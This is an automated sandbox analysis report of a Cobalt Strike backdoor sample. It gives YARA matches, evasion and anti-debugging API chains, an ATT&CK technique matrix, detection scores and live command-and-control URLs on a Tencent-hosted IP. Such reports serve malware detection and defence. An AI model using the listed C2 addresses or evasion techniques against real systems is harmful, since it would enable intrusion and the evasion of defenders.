          Source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTRMatched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@1/1
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00670B70 LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00670B70
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00673A64 CreateThread,GetModuleHandleA,GetProcAddress,CreateToolhelp32Snapshot,Thread32Next,Sleep,0_2_00673A64
          Source: 2VsJzzWTpA.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 2VsJzzWTpA.exeReversingLabs: Detection: 86%
          Source: 2VsJzzWTpA.exeVirustotal: Detection: 73%
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: cryptnet.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: cabinet.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior

          Data Obfuscation

          barindex
          Detected unpacking (creates a PE file in dynamic memory)
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeUnpacked PE file: 0.2.2VsJzzWTpA.exe.660000.2.unpack
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0066D83C
          Source: 2VsJzzWTpA.exeStatic PE information: section name: .xdata
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_001D776C push 0000006Ah; retf 0_2_001D7784
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0069916C push 0000006Ah; retf 0_2_00699184
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006801A8 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006801A8
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior

          Malware Analysis System Evasion

          barindex
          Contains functionality to detect sleep reduction / modifications
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006758540_2_00675854
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066FA1C0_2_0066FA1C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-37564
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-37701
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeAPI coverage: 6.4 %
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066FA1C0_2_0066FA1C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe TID: 7308Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe TID: 7320Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exe TID: 7320Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00679220
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00671C30
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeThread delayed: delay time: 60000Jump to behavior
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeThread delayed: delay time: 60000Jump to behavior
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW;
          Source: 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007BF000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763192162.00000000007BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeAPI call chain: ExitProcess graph end nodegraph_0-37631

          Anti Debugging

          barindex
          Found API chain indicative of debugger detection
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeDebugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleepgraph_0-37305
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068F810 MultiByteToWideChar,MultiByteToWideChar,DebuggerProbe,DebuggerRuntime,IsDebuggerPresent,_RTC_GetSrcLine,WideCharToMultiByte,WideCharToMultiByte,0_2_0068F810
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00689744 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00689744
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0066D83C GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_0066D83C
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0068C0C8 _lseeki64_nolock,_lseeki64_nolock,GetProcessHeap,HeapAlloc,_errno,_errno,_setmode_nolock,__doserrno,_errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,SetEndOfFile,_errno,__doserrno,GetLastError,_lseeki64_nolock,0_2_0068C0C8
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,0_2_00401180
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,0_2_00401A70
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_004542E4 SetUnhandledExceptionFilter,0_2_004542E4
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00402F62 SetUnhandledExceptionFilter,0_2_00402F62
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006924F0 SetUnhandledExceptionFilter,0_2_006924F0
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_006844D0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006844D0

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Yara detected Powershell download and execute
          Source: Yara matchFile source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0067DF50 LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError,0_2_0067DF50
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00692050 AllocateAndInitializeSid,0_2_00692050
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle,0_2_00401630
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00401990
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00675E28 GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf,0_2_00675E28
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Remote Access Functionality

          barindex
          Yara detected CobaltStrike
          Source: Yara matchFile source: Process Memory Space: 2VsJzzWTpA.exe PID: 7304, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.2VsJzzWTpA.exe.1a0000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2VsJzzWTpA.exe.1a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.3496949066.00000000001A0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.2VsJzzWTpA.exe.660000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2VsJzzWTpA.exe.660000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00676A78 socket,htons,ioctlsocket,closesocket,bind,listen,0_2_00676A78
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00676670 htonl,htons,socket,closesocket,bind,ioctlsocket,0_2_00676670
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_00692630 bind,0_2_00692630
          Source: C:\Users\user\Desktop\2VsJzzWTpA.exeCode function: 0_2_0067EE8C socket,closesocket,htons,bind,listen,0_2_0067EE8C

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		2
          Valid Accounts          		2
          Valid Accounts          		2
          Valid Accounts          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/Job1
          DLL Side-Loading          		21
          Access Token Manipulation          		111
          Virtualization/Sandbox Evasion          		LSASS Memory1
          Query Registry          		Remote Desktop ProtocolData from Removable Media1
          Non-Standard Port          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          Process Injection          		21
          Access Token Manipulation          		Security Account Manager241
          Security Software Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Ingress Tool Transfer          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
          DLL Side-Loading          		1
          Process Injection          		NTDS111
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture1
          Non-Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
          Obfuscated Files or Information          		LSA Secrets1
          Process Discovery          		SSHKeylogging11
          Application Layer Protocol          		Scheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing          		Cached Domain Credentials1
          Account Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSync1
          System Owner/User Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
          File and Directory Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow4
          System Information Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          2VsJzzWTpA.exe86%ReversingLabsWin64.Backdoor.CobaltStrike
          2VsJzzWTpA.exe74%VirustotalBrowse
          2VsJzzWTpA.exe100%AviraHEUR/AGEN.1344321
          2VsJzzWTpA.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://134.175.121.153/0%Avira URL Cloudsafe
          https://134.175.121.153:5045/loadK0%Avira URL Cloudsafe
          134.175.121.1530%Avira URL Cloudsafe
          https://134.175.121.153/Z0%Avira URL Cloudsafe
          https://134.175.121.153:5045/loadp0%Avira URL Cloudsafe
          http://127.0.0.1:%u/0%Avira URL Cloudsafe
          https://134.175.121.153:5045/load0%Avira URL Cloudsafe
          https://134.175.121.153:5045/loadn0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          		199.232.214.172
          		truefalse
            		high
            198.187.3.20.in-addr.arpa
            		unknown
            		unknownfalse
              		high

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              134.175.121.153true
              • Avira URL Cloud: safe
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              https://134.175.121.153:5045/loadK2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://134.175.121.153/2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://127.0.0.1:%u/2VsJzzWTpA.exe, 00000000.00000002.3497074630.0000000000660000.00000040.00001000.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://134.175.121.153/Z2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000075C000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://134.175.121.153:5045/loadp2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://134.175.121.153:5045/load2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000084A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2763264612.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.00000000007B3000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497478511.0000000003CB2000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              https://134.175.121.153:5045/loadn2VsJzzWTpA.exe, 00000000.00000003.2763216324.000000000081A000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308989806.0000000000818000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000003.2308900312.0000000000817000.00000004.00000020.00020000.00000000.sdmp, 2VsJzzWTpA.exe, 00000000.00000002.3497152919.000000000081A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              		unknown

              World Map of Contacted IPs

              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs

              Public IPs

              IPDomainCountryFlagASNASN NameMalicious
              134.175.121.153
              		unknownChina
              		45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompatrue

              General Information

              Joe Sandbox version:41.0.0 Charoite
              Analysis ID:1582935
              Start date and time:2025-01-01 02:03:47 +01:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 5m 6s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Run with higher sleep bypass
              Number of analysed new started processes analysed:5
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:2VsJzzWTpA.exe
              renamed because original name is a hash value
              Original Sample Name:791bbe51360bb7afbe10c8daf7ad6b5c.exe
              Detection:MAL
              Classification:mal100.troj.evad.winEXE@1/2@1/1
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 15
              • Number of non-executed functions: 165
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

              Warnings

              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
              • Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.149.20.212, 20.3.187.198, 20.12.23.50, 13.107.246.45
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.

              Simulations

              Behavior and APIs

              No simulations

              Joe Sandbox View / Context

              IPs

              No context

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              bg.microsoft.map.fastly.netYJaaZuNHwI.exeGet hashmaliciousQuasarBrowse
              • 199.232.210.172
              O782uurN5d.exeGet hashmaliciousDCRatBrowse
              • 199.232.210.172
              bKxtUOPLtR.exeGet hashmaliciousAveMaria, DcRat, KeyLogger, StormKitty, VenomRATBrowse
              • 199.232.210.172
              46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
              • 199.232.210.172
              vEtDFkAZjO.exeGet hashmaliciousRL STEALER, StormKittyBrowse
              • 199.232.214.172
              GYede3Gwn0.lnkGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              Qu3ped8inH.exeGet hashmaliciousUnknownBrowse
              • 199.232.210.172
              DIS_37745672.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
              • 199.232.214.172
              https://gogl.to/3HGTGet hashmaliciousCAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRATBrowse
              • 199.232.214.172

              ASNs

              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompaS17.exeGet hashmaliciousUnknownBrowse
              • 192.144.128.212
              loligang.ppc.elfGet hashmaliciousMiraiBrowse
              • 106.55.194.191
              db0fa4b8db0333367e9bda3ab68b8042.m68k.elfGet hashmaliciousMirai, GafgytBrowse
              • 111.231.124.162
              7wOqCnSoTo.exeGet hashmaliciousGhostRatBrowse
              • 106.54.31.97
              db0fa4b8db0333367e9bda3ab68b8042.i686.elfGet hashmaliciousMirai, GafgytBrowse
              • 118.28.147.172
              db0fa4b8db0333367e9bda3ab68b8042.sh4.elfGet hashmaliciousMirai, GafgytBrowse
              • 49.235.142.203
              db0fa4b8db0333367e9bda3ab68b8042.spc.elfGet hashmaliciousMirai, GafgytBrowse
              • 150.158.255.197
              telnet.arm.elfGet hashmaliciousUnknownBrowse
              • 106.53.85.48
              telnet.sh4.elfGet hashmaliciousUnknownBrowse
              • 129.211.52.2

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

              Download File
              Process:C:\Users\user\Desktop\2VsJzzWTpA.exe
              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
              Category:dropped
              Size (bytes):71954
              Entropy (8bit):7.996617769952133
              Encrypted:true
              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
              Malicious:false
              Reputation:high, very likely benign file
              Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

              Download File
              Process:C:\Users\user\Desktop\2VsJzzWTpA.exe
              File Type:data
              Category:modified
              Size (bytes):328
              Entropy (8bit):3.2539954282295116
